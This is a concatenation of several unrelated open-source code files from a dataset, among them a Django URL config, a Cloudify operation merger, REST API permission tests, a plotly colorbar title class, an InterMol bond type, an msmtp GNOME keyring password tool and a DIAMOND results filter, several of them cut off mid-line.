    def _send_init_event(self):
        """Emit the 'Event-Source-Started' command event after the delay."""
        event = events.Command(self.source_id, 'ztreamy-command',
                               'Event-Source-Started')
        pub = EventPublisher(event, self.publishers, add_timestamp=False)
        self._pending_events.append(pub)
        self.io_loop.add_timeout(time.time() + self.initial_delay, pub.publish)
def exponential_event_scheduler(mean_time, initial_delay=0.0):
    """Yield an endless series of fire times with exponentially distributed
    gaps whose mean is `mean_time` seconds, starting `initial_delay`
    seconds from now."""
    fire_time = time.time() + initial_delay
    rate = 1.0 / mean_time
    while True:
        fire_time += random.expovariate(rate)
        yield fire_time
def constant_event_scheduler(mean_time, initial_delay=0.0):
    """Yield an endless series of fire times spaced exactly `mean_time`
    seconds apart, starting `initial_delay` seconds from now."""
    fire_time = time.time() + initial_delay
    while True:
        fire_time += mean_time
        yield fire_time
def get_scheduler(description, initial_delay=0.0):
pos = description.find('[')
if pos == -1 or description[-1] != ']':
raise ZtreamyException('error in distribution specification',
'event_source params')
distribution = description[:pos].strip()
params = [float(num) for num in description[pos + 1:-1].split(',')]
if distribution == 'exp':
if len(params) != 1:
raise ZtreamyException('exp distribution needs 1 param',
'event_source params')
return exponential_event_scheduler(params[ |
aitoralmeida/geo-lak | LAK_2014/LAK_2014/urls.py | Python | gpl-2.0 | 657 | 0.001522 | # coding: utf-8
# URL configuration for the LAK_2014 Django project.
from django.conf.urls import patterns, include, url
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
# Uncomment the next two lines to enable the admin:
# from django.contrib import admin
# admin.autodiscover()
urlpatterns = patterns('',
    # Site root is served by the project's index view.
    url(r'^$', 'LAK_2014.views.index', name='index'),
    # Uncomment the admin/doc line below to enable admin documentation:
    # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
    # Uncomment the next line to enable the admin:
    # url(r'^admin/', include(admin.site.urls)),
)
# Serve static files through Django (development-style serving).
urlpatterns += staticfiles_urlpatterns()
# Custom handler for 404 responses.
handler404 = 'LAK_2014.views.view404'
cloudify-cosmo/cloudify-dsl-parser | dsl_parser/interfaces/operation_merger.py | Python | apache-2.0 | 8,610 | 0 | ########
# Copyright (c) 2014 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
from dsl_parser.interfaces.constants import NO_OP
from dsl_parser.interfaces.utils import (operation_mapping,
merge_schema_and_instance_inputs)
class OperationMerger(object):
    """Base class for operation-merging strategies."""

    @staticmethod
    def _create_operation(raw_operation):
        """Normalize a raw operation (None, string or dict) into a mapping.

        A bare string is shorthand for an implementation with no inputs;
        a dict may carry any subset of the operation's fields.
        """
        if raw_operation is None:
            return None
        if isinstance(raw_operation, str):
            return operation_mapping(
                implementation=raw_operation,
                inputs={},
                executor=None,
                max_retries=None,
                retry_interval=None)
        if isinstance(raw_operation, dict):
            get = raw_operation.get
            return operation_mapping(
                implementation=get('implementation', ''),
                inputs=get('inputs', {}),
                executor=get('executor', None),
                max_retries=get('max_retries', None),
                retry_interval=get('retry_interval', None))

    def merge(self):
        raise NotImplementedError('Must be implemented by subclasses')
class NodeTemplateNodeTypeOperationMerger(OperationMerger):
    """Merges an operation declared on a node template with the same
    operation declared on its node type.

    Template values take precedence; when the template keeps the type's
    implementation, its inputs are validated against the type's schema.
    """
    def __init__(self,
                 overriding_operation,
                 overridden_operation):
        # overriding_operation: the node template's operation definition.
        # overridden_operation: the node type's operation definition.
        self.node_type_operation = self._create_operation(
            overridden_operation)
        self.node_template_operation = self._create_operation(
            overriding_operation)
    def _derive_implementation(self):
        """Return the template's implementation if set, else the type's."""
        merged_operation_implementation = \
            self.node_template_operation['implementation']
        if not merged_operation_implementation:
            # node template does not define an implementation
            # this means we want to inherit the implementation
            # from the type
            merged_operation_implementation = \
                self.node_type_operation['implementation']
        return merged_operation_implementation
    def _derive_inputs(self, merged_operation_implementation):
        """Return the merged inputs, depending on whose implementation won."""
        if merged_operation_implementation == \
                self.node_type_operation['implementation']:
            # this means the node template inputs should adhere to
            # the node type inputs schema (since its the same implementation)
            merged_operation_inputs = merge_schema_and_instance_inputs(
                schema_inputs=self.node_type_operation['inputs'],
                instance_inputs=self.node_template_operation['inputs']
            )
        else:
            # the node template implementation overrides
            # the node type implementation. this means
            # we take the inputs defined in the node template
            merged_operation_inputs = \
                self.node_template_operation['inputs']
        return merged_operation_inputs
    def _derive_executor(self, merged_operation_implementation):
        return self._derive_with_impl('executor',
                                      merged_operation_implementation)
    def _derive_max_retries(self, merged_operation_implementation):
        return self._derive_with_impl('max_retries',
                                      merged_operation_implementation)
    def _derive_retry_interval(self, merged_operation_implementation):
        return self._derive_with_impl('retry_interval',
                                      merged_operation_implementation)
    def _derive_with_impl(self, field_name, merged_operation_implementation):
        """Merge one scalar field, honoring which implementation won."""
        node_type_operation_value = self.node_type_operation[
            field_name]
        node_template_operation_value = self.node_template_operation[
            field_name]
        if merged_operation_implementation != \
                self.node_type_operation['implementation']:
            # this means the node template operation value will take
            # precedence (even if it is None, in which case,
            # the default value will apply (plugin for executor, and global
            # config for retry params)
            return node_template_operation_value
        if node_template_operation_value is not None:
            # node template operation value is declared
            # explicitly, use it
            return node_template_operation_value
        return node_type_operation_value
    def merge(self):
        """Return the merged operation mapping (or None if neither side
        defines the operation)."""
        if self.node_type_operation is None:
            # the operation is not defined in the type
            # should be merged by the node template operation
            return self.node_template_operation
        if self.node_template_operation is None:
            # the operation is not defined in the template
            # should be merged by the node type operation
            # this will validate that all schema inputs have
            # default values
            return operation_mapping(
                implementation=self.node_type_operation['implementation'],
                inputs=merge_schema_and_instance_inputs(
                    schema_inputs=self.node_type_operation['inputs'],
                    instance_inputs={}
                ),
                executor=self.node_type_operation['executor'],
                max_retries=self.node_type_operation['max_retries'],
                retry_interval=self.node_type_operation['retry_interval'],
            )
        if self.node_template_operation == NO_OP:
            # no-op overrides
            return NO_OP
        if self.node_type_operation == NO_OP:
            # no-op overridden
            return self.node_template_operation
        merged_operation_implementation = self._derive_implementation()
        merged_operation_inputs = self._derive_inputs(
            merged_operation_implementation)
        merged_operation_executor = self._derive_executor(
            merged_operation_implementation)
        merged_operation_retries = self._derive_max_retries(
            merged_operation_implementation)
        merged_operation_retry_interval = self._derive_retry_interval(
            merged_operation_implementation)
        return operation_mapping(
            implementation=merged_operation_implementation,
            inputs=merged_operation_inputs,
            executor=merged_operation_executor,
            max_retries=merged_operation_retries,
            retry_interval=merged_operation_retry_interval
        )
class NodeTypeNodeTypeOperationMerger(OperationMerger):
def __init__(self,
overriding_operation,
overridden_operation):
self.overridden_node_type_operation = self._create_operation(
overridden_operation)
self.overriding_node_type_operation = self._create_operation(
overriding_operation)
def merge(self):
if self.overriding_node_type_operation is None:
return self.overridden_node_type_operation
if self.overriding_n | ode_type_operation == NO_OP:
return NO_OP
merged_operation_implementation = \
self.overriding_node_type_operation['implementation']
merged_operation_inputs = \
self.overriding_node_type_operation['inputs']
merged_operation_exe | cutor = \
self.overriding_node_type_operation['executor']
merged_operation_max_retries = \
self.overriding_node_type_operation['max_retries']
merged_operation_retry_interval = \
self.overriding_node_type_operation['retry_interval']
return operation_mapping(
implementation=merg |
cnobile2012/inventory | inventory/categories/api/tests/test_categories_api.py | Python | mit | 33,305 | 0.000961 | # -*- coding: utf-8 -*-
#
# inventory/categories/api/tests/test_categories_api.py
#
from django.contrib.auth import get_user_model
from rest_framework.reverse import reverse
from rest_framework import status
from rest_framework.test import APITestCase
from inventory.categories.models import Category
from inventory.common.api.tests.base_test import BaseTest
from inventory.projects.models import Membership
UserModel = get_user_model()
class TestCategoryAPI(BaseTest, APITestCase):
DEFAULT_USER = UserModel.ROLE_MAP[UserModel.DEFAULT_USER]
PROJECT_USER = Membership.ROLE_MAP[Membership.PROJECT_USER]
    def __init__(self, name):
        # No extra initialization; defers to BaseTest/APITestCase.
        super().__init__(name)
    def setUp(self):
        super().setUp()
        # Create an InventoryType and Project.
        self.in_type = self._create_inventory_type()
        # The test user is enrolled in the project as a PROJECT_USER.
        members = [
            {'user': self.user, 'role_text': self.PROJECT_USER}
            ]
        self.project = self._create_project(self.in_type, members=members)
        # Cache the project's detail URI for use as request payload data.
        kwargs = {'public_id': self.project.public_id}
        self.project_uri = reverse('project-detail', kwargs=kwargs)
def get_category_field(self, uri, field):
"""
Get a category and return the value of the provided field.
"""
response = self.client.get(uri, format='json')
return response.data.get(field)
    def test_GET_category_list_with_invalid_permissions(self):
        """
        Test the category_list endpoint with no permissions.
        """
        #self.skipTest("Temporarily skipped")
        method = 'get'
        # Seed one category so the list endpoint has content behind it.
        category = self._create_category(self.project, "Test Root Category")
        uri = reverse('category-list')
        self._test_users_with_invalid_permissions(uri, method)
        self._test_project_users_with_invalid_permissions(uri, method)
    def test_GET_category_list_with_valid_permissions(self):
        """
        Test the category_list endpoint with valid permissions.
        """
        #self.skipTest("Temporarily skipped")
        method = 'get'
        category = self._create_category(self.project, "Test Root Category")
        uri = reverse('category-list')
        # The global default user is excluded here (default_user=False).
        self._test_users_with_valid_permissions(
            uri, method, default_user=False)
        self._test_project_users_with_valid_permissions(uri, method)
    def test_POST_category_list_with_invalid_permissions(self):
        """
        Test that a POST to category_list fails with invalid permissions.
        """
        #self.skipTest("Temporarily skipped")
        method = 'post'
        uri = reverse('category-list')
        # One request payload per global role (SU/AD/DU), all identical.
        data = {}
        su = data.setdefault('SU', {})
        su['name'] = 'TestCategory-01'
        su['project'] = self.project_uri
        data.setdefault('AD', su.copy())
        data.setdefault('DU', su.copy())
        self._test_users_with_invalid_permissions(
            uri, method, request_data=data)
        # Project-scoped roles (POW/PMA/PDU) reuse the same payload.
        data.setdefault('POW', su.copy())
        data.setdefault('PMA', su.copy())
        data.setdefault('PDU', su.copy())
        self._test_project_users_with_invalid_permissions(
            uri, method, request_data=data)
    def test_POST_category_list_with_valid_permissions(self):
        """
        Test that a POST to category_list passes with valid permissions.
        """
        #self.skipTest("Temporarily skipped")
        method = 'post'
        uri = reverse('category-list')
        # Each role posts a uniquely named category.
        data = {}
        su = data.setdefault('SU', {})
        su['name'] = 'TestCategory-01'
        su['project'] = self.project_uri
        ad = data.setdefault('AD', su.copy())
        ad['name'] = 'TestCategory-02'
        du = data.setdefault('DU', su.copy())
        du['name'] = 'TestCategory-03'
        self._test_users_with_valid_permissions(
            uri, method, request_data=data)
        pow = data.setdefault('POW', su.copy())
        pow['name'] = 'TestCategory-04'
        pma = data.setdefault('PMA', su.copy())
        pma['name'] = 'TestCategory-05'
        pdu = data.setdefault('PDU', su.copy())
        pdu['name'] = 'TestCategory-06'
        self._test_project_users_with_valid_permissions(
            uri, method, project_user=False, request_data=data)
    def test_OPTIONS_category_list_with_invalid_permissions(self):
        """
        Test that the method OPTIONS fails with invalid permissions.
        """
        #self.skipTest("Temporarily skipped")
        method = 'options'
        uri = reverse('category-list')
        self._test_users_with_invalid_permissions(uri, method)
        self._test_project_users_with_invalid_permissions(uri, method)
    def test_OPTIONS_category_list_with_valid_permissions(self):
        """
        Test that the method OPTIONS brings back the correct data.
        """
        method = 'options'
        uri = reverse('category-list')
        self._test_users_with_valid_permissions(uri, method)
        self._test_project_users_with_valid_permissions(uri, method)
    def test_GET_category_detail_with_invalid_permissions(self):
        """
        Test that a GET on the category_detail fails with invalid permissions.
        """
        #self.skipTest("Temporarily skipped")
        # Create the category whose detail endpoint is exercised.
        category = self._create_category(self.project, "Test Root Category")
        uri = reverse('category-detail',
                      kwargs={'public_id': category.public_id})
        method = 'get'
        self._test_users_with_invalid_permissions(uri, method)
        self._test_project_users_with_invalid_permissions(uri, method)
    def test_GET_category_detail_with_valid_permissions(self):
        """
        Test that a GET to category_detail passes with valid permissions.
        """
        #self.skipTest("Temporarily skipped")
        category = self._create_category(self.project, "Test Root Category")
        uri = reverse('category-detail',
                      kwargs={'public_id': category.public_id})
        method = 'get'
        self._test_users_with_valid_permissions(uri, method)
        self._test_project_users_with_valid_permissions(uri, method)
    def test_PUT_category_detail_with_invalid_permissions(self):
        """
        Test that a PUT to category_detail fails with invalid permissions.
        """
        #self.skipTest("Temporarily skipped")
        category = self._create_category(self.project, "Test Root Category")
        uri = reverse('category-detail',
                      kwargs={'public_id': category.public_id})
        method = 'put'
        # One request payload per role; all identical for the failure case.
        data = {}
        su = data.setdefault('SU', {})
        su['name'] = 'TestCategory-01'
        su['project'] = self.project_uri
        data.setdefault('AD', su.copy())
        data.setdefault('DU', su.copy())
        self._test_users_with_invalid_permissions(
            uri, method, request_data=data)
        data.setdefault('POW', su.copy())
        data.setdefault('PMA', su.copy())
        data.setdefault('PDU', su.copy())
        self._test_project_users_with_invalid_permissions(
            uri, method, request_data=data)
def test_PUT_category_detail_with_valid_permissions(self):
"""
Test that a PUT to category_detail passes with valid permissions.
"""
#self.skipTest("Temporarily skipped")
category = self._create_category(self.project, "Test Root Category")
uri = reverse('category-detail',
kwargs={'public_id': category.public_id})
method = 'put'
data = {}
su = data.setdefault('SU', {})
su['name'] = 'TestCategory-01'
su['project'] = self.project_uri
ad = data.setdefault('AD', su.copy())
ad['name'] = 'TestCategory-02'
du = data.setdefault('DU', su.copy())
du['name'] = 'TestCategory-03'
self._test_users_with_valid_permissions(
uri, method, request_data=data)
pow = data.setdefault('POW', su.copy())
pow['name'] = 'TestCategory-04'
pma = data.setdefault('PMA', su.copy())
pma['name'] = 'TestCategory-05'
pdu = data.setdefault('PDU', su.copy())
pdu['name'] = 'TestCategory-06'
self._test_project_users_with_valid_permissions(
uri, method, project_user=False, |
plotly/plotly.py | packages/python/plotly/plotly/graph_objs/scattersmith/marker/colorbar/_title.py | Python | mit | 7,130 | 0.001543 | from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Title(_BaseTraceHierarchyType):
    """Colorbar title for scattersmith markers: its text, font and side."""

    # class properties
    # --------------------
    _parent_path_str = "scattersmith.marker.colorbar"
    _path_str = "scattersmith.marker.colorbar.title"
    _valid_props = {"font", "side", "text"}

    # font
    # ----
    @property
    def font(self):
        """
        Sets this color bar's title font. Note that the title's font
        used to be set by the now deprecated `titlefont` attribute.

        The 'font' property is an instance of Font
        that may be specified as:
          - An instance of :class:`plotly.graph_objs.scattersmith.marker.colorbar.title.Font`
          - A dict of string/value properties that will be passed
            to the Font constructor

            Supported dict properties:

                color

                family
                    HTML font family - the typeface that will be
                    applied by the web browser. The web browser
                    will only be able to apply a font if it is
                    available on the system which it operates.
                    Provide multiple font families, separated by
                    commas, to indicate the preference in which to
                    apply fonts if they aren't available on the
                    system. The Chart Studio Cloud (at
                    https://chart-studio.plotly.com or on-premise)
                    generates images on a server, where only a
                    select number of fonts are installed and
                    supported. These include "Arial", "Balto",
                    "Courier New", "Droid Sans",, "Droid Serif",
                    "Droid Sans Mono", "Gravitas One", "Old
                    Standard TT", "Open Sans", "Overpass", "PT Sans
                    Narrow", "Raleway", "Times New Roman".

                size

        Returns
        -------
        plotly.graph_objs.scattersmith.marker.colorbar.title.Font
        """
        return self["font"]

    @font.setter
    def font(self, val):
        self["font"] = val

    # side
    # ----
    @property
    def side(self):
        """
        Determines the location of color bar's title with respect to
        the color bar. Defaults to "top" when `orientation` if "v" and
        defaults to "right" when `orientation` if "h". Note that the
        title's location used to be set by the now deprecated
        `titleside` attribute.

        The 'side' property is an enumeration that may be specified as:
          - One of the following enumeration values:
                ['right', 'top', 'bottom']

        Returns
        -------
        Any
        """
        return self["side"]

    @side.setter
    def side(self, val):
        self["side"] = val

    # text
    # ----
    @property
    def text(self):
        """
        Sets the title of the color bar. Note that before the existence
        of `title.text`, the title's contents used to be defined as the
        `title` attribute itself. This behavior has been deprecated.

        The 'text' property is a string and must be specified as:
          - A string
          - A number that will be converted to a string

        Returns
        -------
        str
        """
        return self["text"]

    @text.setter
    def text(self, val):
        self["text"] = val

    # Self properties description
    # ---------------------------
    @property
    def _prop_descriptions(self):
        return """\
        font
            Sets this color bar's title font. Note that the title's
            font used to be set by the now deprecated `titlefont`
            attribute.
        side
            Determines the location of color bar's title with
            respect to the color bar. Defaults to "top" when
            `orientation` if "v" and defaults to "right" when
            `orientation` if "h". Note that the title's location
            used to be set by the now deprecated `titleside`
            attribute.
        text
            Sets the title of the color bar. Note that before the
            existence of `title.text`, the title's contents used to
            be defined as the `title` attribute itself. This
            behavior has been deprecated.
        """

    def __init__(self, arg=None, font=None, side=None, text=None, **kwargs):
        """
        Construct a new Title object

        Parameters
        ----------
        arg
            dict of properties compatible with this constructor or
            an instance of :class:`plotly.graph_objs.scattersmith.m
            arker.colorbar.Title`
        font
            Sets this color bar's title font. Note that the title's
            font used to be set by the now deprecated `titlefont`
            attribute.
        side
            Determines the location of color bar's title with
            respect to the color bar. Defaults to "top" when
            `orientation` if "v" and defaults to "right" when
            `orientation` if "h". Note that the title's location
            used to be set by the now deprecated `titleside`
            attribute.
        text
            Sets the title of the color bar. Note that before the
            existence of `title.text`, the title's contents used to
            be defined as the `title` attribute itself. This
            behavior has been deprecated.

        Returns
        -------
        Title
        """
        super(Title, self).__init__("title")

        if "_parent" in kwargs:
            self._parent = kwargs["_parent"]
            return

        # Validate arg
        # ------------
        if arg is None:
            arg = {}
        elif isinstance(arg, self.__class__):
            arg = arg.to_plotly_json()
        elif isinstance(arg, dict):
            arg = _copy.copy(arg)
        else:
            raise ValueError(
                """\
The first argument to the plotly.graph_objs.scattersmith.marker.colorbar.Title
constructor must be a dict or
an instance of :class:`plotly.graph_objs.scattersmith.marker.colorbar.Title`"""
            )

        # Handle skip_invalid
        # -------------------
        self._skip_invalid = kwargs.pop("skip_invalid", False)
        self._validate = kwargs.pop("_validate", True)

        # Populate data dict with properties
        # ----------------------------------
        _v = arg.pop("font", None)
        _v = font if font is not None else _v
        if _v is not None:
            self["font"] = _v
        _v = arg.pop("side", None)
        _v = side if side is not None else _v
        if _v is not None:
            self["side"] = _v
        _v = arg.pop("text", None)
        _v = text if text is not None else _v
        if _v is not None:
            self["text"] = _v

        # Process unknown kwargs
        # ----------------------
        self._process_kwargs(**dict(arg, **kwargs))

        # Reset skip_invalid
        # ------------------
        self._skip_invalid = False
|
RamonGuiuGou/l10n-spain | l10n_es_aeat/models/l10n_es_aeat_map_tax_line.py | Python | agpl-3.0 | 1,386 | 0 | # -*- coding: utf-8 -*-
# Copyright 2013-2016 Pedro M. Baeza <pedro.baeza@tecnativa.com>
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl
from openerp import fields, models
class L10nEsAeatMapTaxLine(models.Model):
    """One line of an AEAT tax-report mapping: which taxes feed which
    numbered field of the report and how their amounts are summarized."""
    _name = 'l10n.es.aeat.map.tax.line'
    _order = "field_number asc, id asc"
    # Number of the box/field in the AEAT report this line fills.
    field_number = fields.Integer(string="Field number", required=True)
    # Tax templates whose moves are aggregated into this field.
    tax_ids = fields.Many2many(
        comodel_name='account.tax.template', string="Taxes templates",
        required=True)
    name = fields.Char(string="Name", required=True)
    # Parent mapping this line belongs to.
    map_parent_id = fields.Many2one(
        comodel_name='l10n.es.aeat.map.tax', required=True)
    # Which move types are considered when summing.
    move_type = fields.Selection(
        selection=[
            ('all', 'All'),
            ('regular', 'Regular'),
            ('refund', 'Refund'),
        ], string="Operation type", default='all')
    # Whether the tax base or the tax amount is reported.
    field_type = fields.Selection(
        selection=[
            ('base', 'Base'),
            ('amount', 'Amount'),
        ], string="Field type", default='amount')
    # How credit/debit sides are combined into the reported figure.
    sum_type = fields.Selection(
        selection=[
            ('credit', 'Credit'),
            ('debit', 'Debit'),
            ('both', 'Both (Credit - Debit)'),
        ], string="Summarize type", default='both')
    # Flip the sign of the summarized amount.
    inverse = fields.Boolean(string="Inverse summarize sign", default=False)
    to_regularize = fields.Boolean(string="To regularize")
|
schaabs/sandbox | net/sandbox.keyvault/python/repl/secrets.py | Python | mit | 160 | 0 | from key_vault_agent | import KeyVaultAgent
class SecretsAgent(KeyVaultAgent):
    """Key Vault agent that works with secrets."""

    def get_secret(self):
        """Fetch a secret through the agent's data client.

        NOTE(review): despite the name, this delegates to
        ``restore_secret`` on the data client -- confirm that the
        restore operation (rather than a plain read) is intended.
        """
        # Return the client's result instead of discarding it (the original
        # body ended with a redundant ``pass`` and returned None; callers
        # that ignored the old return value are unaffected).
        return self.data_client.restore_secret()
|
proyectosdeley/proyectos_de_ley | proyectos_de_ley/pdl/migrations/0002_proyecto_legislatura.py | Python | mit | 492 | 0 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2016-09-02 20: | 49
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add the 'legislatura' field to the Proyecto model."""

    dependencies = [
        ('pdl', '0001_initial'),
    ]

    operations = [
        migrations.AddField(
            model_name='proyecto',
            name='legislatura',
            # NOTE(review): max_length has no effect on IntegerField (Django
            # ignores it there); kept as-is because applied migrations
            # should not be rewritten.
            field=models.IntegerField(default=2011, max_length=4),
            # default=2011 only backfills existing rows during migration.
            preserve_default=False,
        ),
    ]
|
ctk3b/InterMol | intermol/forces/cubic_bond_type.py | Python | mit | 1,664 | 0.006611 | import simtk.unit as units
from intermol.decorators import accepts_compatible_units
from intermol.forces.abstract_bond_type import AbstractBondType
class CubicBondType(AbstractBondType):
    """Bond type with a cubic potential, parameterized by the equilibrium
    length and the quadratic (C2) and cubic (C3) force constants."""
    __slots__ = ['length', 'C2', 'C3', 'order', 'c']

    # The decorator validates that each argument carries units compatible
    # with the declared ones before the constructor body runs.
    @accepts_compatible_units(None, None,
                              length=units.nanometers,
                              C2=units.kilojoules_per_mole * units.nanometers ** (-2),
                              C3=units.kilojoules_per_mole * units.nanometers ** (-3),
                              order=None,
                              c=None)
    def __init__(self, bondingtype1, bondingtype2,
                 length=0.0 * units.nanometers,
                 C2=0.0 * units.kilojoules_per_mole * units.nanometers ** (-2),
                 C3=0.0 * units.kilojoules_per_mole * units.nanometers ** (-3),
                 order=1, c=False):
        AbstractBondType.__init__(self, bondingtype1, bondingtype2, order, c)
        self.length = length
        self.C2 = C2
        self.C3 = C3
class CubicBond(CubicBondType):
    """A cubic bond between two specific atoms; binds a pair of atoms to
    a CubicBondType parameter set."""
    def __init__(self, atom1, atom2, bondingtype1=None, bondingtype2=None,
                 length=0.0 * units.nanometers,
                 C2=0.0 * units.kilojoules_per_mole * units.nanometers ** (-2),
                 C3=0.0 * units.kilojoules_per_mole * units.nanometers ** (-3),
                 order=1, c=False):
        # Store the bonded atoms, then delegate parameter handling (and
        # unit validation) to the type's constructor.
        self.atom1 = atom1
        self.atom2 = atom2
        CubicBondType.__init__(self, bondingtype1, bondingtype2,
                               length=length,
                               C2=C2,
                               C3=C3,
                               order=order, c=c)
tpn/msmtp | scripts/msmtp-gnome-tool/msmtp-gnome-tool.py | Python | gpl-3.0 | 6,270 | 0.005423 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Set/get passwords for MSMTP or MPOP in Gnome Keyring
Copyright (C) 2009 Gaizka Villate
2010 Emmanuel Bouthenot
Original author: Gaizka Villate <gaizkav@gmail.com>
Other author(s): Emmanuel Bouthenot <kolter@openics.org>
URL: http://github.com/gaizka/misc-scripts/tree/master/msmtp
This program is free software; you can redistribute it and/or modify it
under the terms of the GNU General Public License as published by the
Free Software Foundation; either version 2 of the License, or (at your
option) any later version. See http://www.gnu.org/copyleft/gpl.html for
the full text of the license.
"""
import sys, os.path, optparse, getpass
try:
import gnomekeyring as gk
except ImportError:
print """Unable to import gnome keyring module
On Debian like systems you probably need to install the following package(s):
python-gnomekeyring"""
sys.exit(-1)
class keyringManager():
    """Stores/retrieves MSMTP or MPOP passwords in the GNOME keyring.

    The application (msmtp/smtp vs. mpop/pop3) is inferred from the name
    the script was invoked under. Python 2 code (print statements).
    """
    def __init__(self):
        # Decide app/protocol from the executable's basename.
        if os.path.basename(sys.argv[0]).find('msmtp') >= 0:
            self.app = 'msmtp'
            self.protocol = 'smtp'
        elif os.path.basename(sys.argv[0]).find('mpop') >= 0:
            self.app = 'mpop'
            self.protocol = 'pop3'
        else:
            print "ERR: program must contain 'msmtp' or 'mpop' in its name"
            sys.exit(-1)
        # get default keyring name
        try:
            self.keyring = gk.get_default_keyring_sync()
        except gk.NoKeyringDaemonError:
            print "ERR: can't open gnome keyring"
            print "Are you running this program under a GNOME session ?"
            sys.exit(-1)
    def get_app(self):
        """Return 'msmtp' or 'mpop'."""
        return self.app
    def get_protocol(self):
        """Return 'smtp' or 'pop3'."""
        return self.protocol
    def set(self, user, password, server):
        """Store a network password in the keyring; True on success."""
        # display name for password.
        display_name = '%s password for %s at %s' % (self.get_app().upper(), user, server)
        # select type. if you want some kind of "network" password, it seems that
        # appropriate type is network_password because it has a schema already.
        type = gk.ITEM_NETWORK_PASSWORD
        usr_attrs = {'user':user, 'server':server, 'protocol':self.get_protocol()}
        # Now it gets ready to add into the keyring. Do it.
        # Its id will be returned if success or an exception will be raised
        id = gk.item_create_sync(self.keyring, type, display_name, usr_attrs, password, False)
        return id is not None
    def get(self, user, server):
        """Return the stored password, or None if there is no match."""
        protocol = self.get_protocol()
        try:
            results = gk.find_network_password_sync(user=user, server=server, protocol=protocol)
        except gk.NoMatchError:
            return None
        return results[0]["password"]
    def getpass(self, username, server):
        """Print the stored password; return False when none is set."""
        ret = True
        passwd = self.get(username, server)
        if passwd is None:
            print "No password set for user '%s' in server '%s'" % (username, server)
            ret = False
        else:
            print "Password for user '%s' in server '%s': '%s'" % (username, server, passwd)
        return ret
    def setpass(self, username, server):
        """Prompt (twice) for a new password and store it; True on success."""
        ret = True
        # Does it already exist?
        if self.get(username, server) is not None:
            print "ERR: %s password for user '%s' in server '%s' already exists, try do delete it first" \
                % (self.get_app().upper(), username, server)
            ret = False
        else:
            msg = "Password for user '%s' in server '%s' ? " %(username, server)
            passwd = getpass.getpass(msg)
            passwd_confirmation = getpass.getpass("Confirmation ? ")
            if passwd != passwd_confirmation:
                print "ERR: password and password confirmation mismatch"
                ret = False
            else:
                if self.set(username, passwd, server):
                    print "Password successfully set"
                else:
                    print "ERR: Password failed to set"
                    ret = False
        return ret
    def delpass(self, username, server):
        """Delete the stored password; False when none was set."""
        ret = True
        # Does it already exist?
        protocol = self.get_protocol()
        try:
            results = gk.find_network_password_sync(user=username, server=server, protocol=protocol)
        except gk.NoMatchError:
            print "No password set for user '%s' in server '%s'" % (username, server)
            ret = False
        if ret:
            gk.item_delete_sync(self.keyring, results[0]['item_id'])
            print "Password successfully removed"
        return ret
def main():
    """Parse command-line options and dispatch to get/set/del; return a
    boolean success flag."""
    ret = True
    km = keyringManager()
    parser = optparse.OptionParser(usage="%prog [-s|-g|-d] --username myuser --server myserver")
    parser.add_option("-s", "--set-password", action="store_true", \
        dest="setpass", help="Set password for %s account" % (km.get_app()))
    parser.add_option("-g", "--get-password", action="store_true", \
        dest="getpass", help="Get password for %s account" % (km.get_app()))
    parser.add_option("-d", "--del-password", action="store_true", \
        dest="delpass", help="Delete password for %s account" % (km.get_app()))
    parser.add_option("-u", "--username", action="store", dest="username", \
        help="Username for %s account" % (km.get_app()))
    parser.add_option("-e", "--server", action="store", dest="server", \
        help="SMTP server for %s account" % (km.get_app()))
    (opts, args) = parser.parse_args()
    # Exactly one action and both identifiers are required.
    if not opts.setpass and not opts.getpass and not opts.delpass:
        parser.print_help()
        print "ERR: You have to use -s or -g or -d"
        ret = False
    elif not opts.username or not opts.server:
        parser.print_help()
        print "ERR: You have to use both --username and --server"
        ret = False
    elif opts.getpass:
        ret = km.getpass(opts.username, opts.server)
    elif opts.setpass:
        ret = km.setpass(opts.username, opts.server)
    elif opts.delpass:
        ret = km.delpass(opts.username, opts.server)
    else:
        print "ERR: Unknown option(s)"
        ret = False
    return ret
if __name__ == '__main__':
    # Map main()'s boolean result onto the process exit status.
    if main():
        sys.exit(0)
    else:
        sys.exit(-1)
|
transcript/samsa_v2 | python_scripts/DIAMOND_results_filter.py | Python | gpl-3.0 | 5,358 | 0.01885 | #!/usr/lib/python2.7
##########################################################################
#
# Copyright (C) 2015-2016 Sam Westreich
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the
# Free Software Foundation;
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
##########################################################################
#
# DIAMOND_results_filter.py
# Created 1/30/17, this version updated 5/22/17
# Sam Westreich, stwestreich@ucdavis.edu, github.com/transcript
#
# Purpose: This takes a DIAMOND outfile and the RefSeq database and pulls
# out hits to any specific organism, identifying the raw input reads that
# were mapped to that organism.
# Usage:
#
# -I infile specifies the infile (a DIAMOND results file
# in m8 format)
# -SO specific target the organism search term, either genus,
# species, or function.
# -D database file specifies a reference database to search
# against for results
# -O outfile name optional; changes the default outfile name
#
##########################################################################
# imports
import operator, sys, time, gzip, re
# String searching function:
def string_find(usage_term):
for idx, elem in enumerate(sys.argv):
this_elem = elem
next_elem = sys.argv[(idx + 1) % len(sys.argv)]
if elem == usage_term:
return next_elem
# loading starting file
if "-I" in sys.argv:
infile_name = string_find("-I")
else:
sys.exit ("WARNING: infile must be specified using '-I' flag.")
# optional outfile of specific organism results
if "-SO" in sys.argv:
target_org = string_find("-SO")
if '"' in target_org:
